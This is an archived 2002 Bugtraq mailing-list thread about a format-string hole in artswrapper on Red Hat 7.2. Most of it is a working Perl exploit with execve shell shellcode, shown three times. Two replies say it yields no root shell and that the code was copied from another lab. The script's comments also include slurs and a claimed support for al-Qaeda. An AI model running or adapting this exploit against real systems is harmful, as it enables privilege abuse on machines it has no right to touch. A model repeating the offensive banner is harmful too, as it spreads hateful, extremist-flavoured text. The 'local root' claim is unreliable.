8699348 2002-07-06 15:45 -0000  /13 rader/ kanix THE HACKER <kanix@twinkie.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-07  23:44  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: vuln-dev@securityfocus.com
Extern mottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <22973>
Ärende: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
From: "kanix THE HACKER" <kanix@twinkie.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
 vuln-dev@securityfocus.com, submissions@packetstormsecurity.org
Message-ID: <20020706194517.27759.qmail@inbox.net>

Greetings,

This is a local exploit for a format string vulnerability in
/usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).

Sincerely,

kanix
(8699348) /kanix THE HACKER <kanix@twinkie.com>/(Ombruten)
Bilaga (text/x-perl) i text 8699349
Kommentar i text 8702710 av Olaf Kirch <okir@suse.de>
Kommentar i text 8703241 av KF <dotslash@snosoft.com>
8699349 2002-07-06 15:45 -0000  /116 rader/ kanix THE HACKER <kanix@twinkie.com>
Bilagans filnamn: "fartsy.pl"
Importerad: 2002-07-07  23:44  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: vuln-dev@securityfocus.com
Extern mottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <22974>
Bilaga (text/plain) till text 8699348
Ärende: Bilaga (fartsy.pl) till: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
#!/usr/bin/perl

########################################################################
#
#	fartsy.pl by kanix <kanix@0xfee1dead.net>
#		/usr/sbin/artswrapper <local format string exploit>
#			Tested on Red Hat Linux release 7.2 (Enigma)
#
#	Jul 6, 2002
#
# 	"the secret to creativity is knowing how to hide your sources."
#		- Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
#	official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
#         security.is, #hackphreak, teleh0r (fame seeking whore like
#         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
#         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################

$kode =
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    = "/usr/bin/artswrapper";
$dtors   = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/;
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    $tmp1  = (($ret_addr >> 16) & 0xffff);
    $tmp2  = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}
(8699349) /kanix THE HACKER <kanix@twinkie.com>/----
8702710 2002-07-08 13:03 +0200  /55 rader/ Olaf Kirch <okir@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-08  18:38  av Brevbäraren
Extern mottagare: kanix THE HACKER <kanix@twinkie.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vulnwatch@vulnwatch.org
Extern kopiemottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <22980>
Kommentar till text 8699348 av kanix THE HACKER <kanix@twinkie.com>
Ärende: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
From: Olaf Kirch <okir@suse.de>
To: kanix THE HACKER <kanix@twinkie.com>
Cc: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
 vuln-dev@securityfocus.com, submissions@packetstormsecurity.org
Message-ID: <20020708130304.G15149@wotan.suse.de>

Disclaimer - I investigated this issue on SuSE, not RedHat, so
the situation there may be somewhat different.

On Sun, Jul 07, 2002 at 09:43:06PM +0000, kanix THE HACKER wrote:
> This is a local exploit for a format string vulnerability in
> /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).

Hm. I am not quite sure why this exploit should give you a root shell
(unless RedHat made artsd setuid root, too).

artswrapper does a seteuid(getuid()) which sets the effective uid back
to that of the caller. Then it calls execv(/opt/.../artsd).  The execv
call takes care of the saved uid. So what you get is a shell running
with realtime scheduling priority, but no root privilege.

For what it's worth, there are simpler methods to obtain a process
with RT-privilege using artsd. Compile the attached program as
/tmp/lalla and check:

	$ artswrapper -m /tmp/lalla -a foo
	>> running as realtime process now (priority 50)
	Current scheduling policy is FIFO

Which is disturbing, but a far cry from root privileges as claimed
in the original posting.

Apart from that, artsd has a load of other ways to break it. Unchecked
vsprintf calls in arts/mcop/debug.cc for instance. But given that
artsd is linked against 16 shared libraries I'm sure there are
at least that many different ways to exploit it.

Fortunately, KDE seems to have picked up the habit of protecting the
directory in which the mcop communication socket resides so that
no-one except the user running artsd can connect.

If I am not mistaken, the original intention of giving artsd real-
time scheduling policy was to make sure that sound data was being
fed to the sound device with a low latency; which is important for
many sound cards which have ridiculously small buffers. It seems
though that artsd has mutated into something much bigger in the
meantime; maybe it's time to consider whether one shouldn't split
off the part feeding the audio device...

Olaf
-- 
Olaf Kirch     |  Anyone who has had to work with X.509 has probably
okir@suse.de   |  experienced what can best be described as
---------------+  ISO water torture. -- Peter Gutmann
(8702710) /Olaf Kirch <okir@suse.de>/-----(Ombruten)
Bilaga (text/plain) i text 8702711
8702711 2002-07-08 13:03 +0200  /18 rader/ Olaf Kirch <okir@suse.de>
Importerad: 2002-07-08  18:38  av Brevbäraren
Extern mottagare: kanix THE HACKER <kanix@twinkie.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vulnwatch@vulnwatch.org
Extern kopiemottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <22981>
Bilaga (text/plain) till text 8702710
Ärende: Bilaga till: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
#include <stdio.h>
#include <sched.h>

int main()
{
	int sched = sched_getscheduler(0);
	const char *name = "unknown";

	switch (sched) {
	case SCHED_FIFO: name = "FIFO"; break;
	case SCHED_RR: name = "RR"; break;
	case SCHED_OTHER: name = "OTHER"; break;
	}

	printf("Current scheduling policy is %s\n", name);
	return 0;
}
(8702711) /Olaf Kirch <okir@suse.de>/---------------
8703241 2002-06-12 22:24 -0700  /264 rader/ KF <dotslash@snosoft.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-08  20:36  av Brevbäraren
Extern mottagare: kanix THE HACKER <kanix@twinkie.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: vulnwatch@vulnwatch.org
Extern kopiemottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <22983>
Kommentar till text 8699348 av kanix THE HACKER <kanix@twinkie.com>
Ärende: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
From: "KF" <dotslash@snosoft.com>
To: "kanix THE HACKER" <kanix@twinkie.com>
Cc: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>,
 <vulnwatch@vulnwatch.org>, <submissions@packetstormsecurity.org>
Message-ID: <000201c212ef$5f9e2a80$0201000a@k7ezizjvt9gjdv>

Heh looks like I fell asleep on releasing this one... and it looks
like the posted code was actually code from our labs (credit where
its due please)...just so you are aware the issue is really in artsd
which is NOT suid ... you should get a shell with your own
privs... Heres where that code really came from....

[root@ghetto dotslash]# artswrapper -a %x
>> running as realtime process now (priority 50)
Error while initializing the sound driver:
unable to select 'bffffa40' style audio I/O
[root@ghetto dotslash]# ls -al `which artswrapper`
-rwsr-sr-x    1 root     root         4136 Sep  8  2001 /usr/bin/artswrapper
[root@ghetto dotslash]# ls -al `which artsd`
-rwxr-xr-x    1 root     root       115284 Sep  8  2001 /usr/bin/artsd
[root@ghetto dotslash]# artsd -a %x
Error while initializing the sound driver:
unable to select 'bffffa80' style audio I/O


[dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl
#!/usr/bin/perl

## ---/ artswrapex.pl /------------------------------------------------
##
## /usr/bin/artswrapper local format string exploit
##   * tested on Red Hat Linux release 7.2 (Enigma)
##   * Jun 17 2002
##
## Author: stringz // thc@drug.org
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
##         obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------

# setuid + execve shellcode
$kode =
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    = "/usr/bin/artswrapper";
$dtors   = 0x8049a7c + 4;;

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("-- stringz // thc\@drug.org\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    # $dest_addr = where to write $ret_addr
    # $ret_addr  = where to return execution
    # $dist      = the calculated distance

    $tmp1  = (($ret_addr >> 16) & 0xffff);
    $tmp2  = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

-KF


----- Original Message -----
From: "kanix THE HACKER" <kanix@twinkie.com>
To: <bugtraq@securityfocus.com>; <vulnwatch@vulnwatch.org>;
<vuln-dev@securityfocus.com>; <submissions@packetstormsecurity.org>
Sent: Saturday, July 06, 2002 3:45 PM
Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT


> Greetings,
>
> This is a local exploit for a format string vulnerability in
/usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).
>
> Sincerely,
>
> kanix
>


----------------------------------------------------------------------------
----


> #!/usr/bin/perl
>
> ########################################################################
> #
> # fartsy.pl by kanix <kanix@0xfee1dead.net>
> # /usr/sbin/artswrapper <local format string exploit>
> # Tested on Red Hat Linux release 7.2 (Enigma)
> #
> # Jul 6, 2002
> #
> # "the secret to creativity is knowing how to hide your sources."
> # - Albert Einstein
> #
> # commentz, job offerz, flamez, etc. should be directed to my e-mail
> # address -- I WILL SCHOOL YOU ALL.
> #
> # SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
> # official supporter of the al-Qaeda Terrorist Network.
> #
> # BURN, BABY, BURN!!!
> #
> # I 0xc0ded this for fun and profit... and to get scene whorez. ;>
> #
> # This code is far from special - my mother could have written it,
> # however, that is the extent of my ability.
> #
> # I can code sploits, but I know nothing of UNC file sharing! I'm
> # still very 0x1337. I mean, I can code exploits, that's what makes
> # you a hacker!
> #
> # SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
> # there are enuff retardz in the hacker scene already (LIKE ME ;>)!
> #
> # Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
> #         security.is, #hackphreak, teleh0r (fame seeking whore like
> #         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
> #         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
> #
> # kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
> #
> # kanix: can some1 pleeze tell me about DNS cache poisoning?
> #
> ########################################################################
>
> $kode =
>   "\x31\xdb".                 # xor ebx, ebx
>   "\xf7\xe3".                 # mul ebx
>   "\xb0\x17".                 # mov al, 0x17
>   "\xcd\x80".                 # int 0x80
>   "\x31\xc0".                 # xor  eax, eax
>   "\x99".                     # cdq
>   "\x52".                     # push edx
>   "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
>   "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
>   "\x89\xe3".                 # mov  ebx, esp
>   "\x52".                     # push edx
>   "\x53".                     # push ebx
>   "\x89\xe1".                 # mov  ecx, esp
>   "\xb0\x0b".                 # mov  al, 0x0b
>   "\xcd\x80";                 # int  0x80
>
> $vuln    = "/usr/bin/artswrapper";
> $dtors   = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)
>
> printf("\n-- /usr/bin/artswrapper local format string exploit\n");
> printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");
>
> $ret_addr = 0xc0000000 - 4
>     - (length($vuln) + 1)
>     - (length($kode) + 1)
>     ;
>
> undef(%ENV); $ENV{'1337'} = $kode;
>
> printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
> printf("bruteforcing distance (1 .. 300)\n");
> sleep(2);
>
> for (1 .. 300) {
>     $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
>     die("\x0a") if (system("$vuln -a $fmt_str"))
>         =~ m/^(0|256|512|32512)$/;
> }
>
> sub
> sw_fmtstr_create ($$$)
> {
>     die("Incorrect number of arguments for sw_fmtstr_create")
>         unless @_ == 3;
>
>     my ($dest_addr, $ret_addr, $dist) = @_;
>     my ($word, $qword) = (2, 8);
>
>     $tmp1  = (($ret_addr >> 16) & 0xffff);
>     $tmp2  = $ret_addr & 0xffff;
>
>     if ($tmp1 < $tmp2) {
>         $high = $tmp1 - $qword;
>         $low  = $tmp2 - $high - $qword;
>
>         $dest_addr1 = pack('L', $dest_addr + $word);
>         $dest_addr2 = pack('L', $dest_addr);
>     }
>     else {
>         $high = $tmp2 - $qword;
>         $low  = $tmp1 - $high - $qword;
>
>         $dest_addr1 = pack('L', $dest_addr);
>         $dest_addr2 = pack('L', $dest_addr + $word);
>     }
>
>     sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
>             $dest_addr1, $dest_addr2, $high, $dist,
>             $low, $dist + 1);
> }
>
(8703241) /KF <dotslash@snosoft.com>/-----(Ombruten)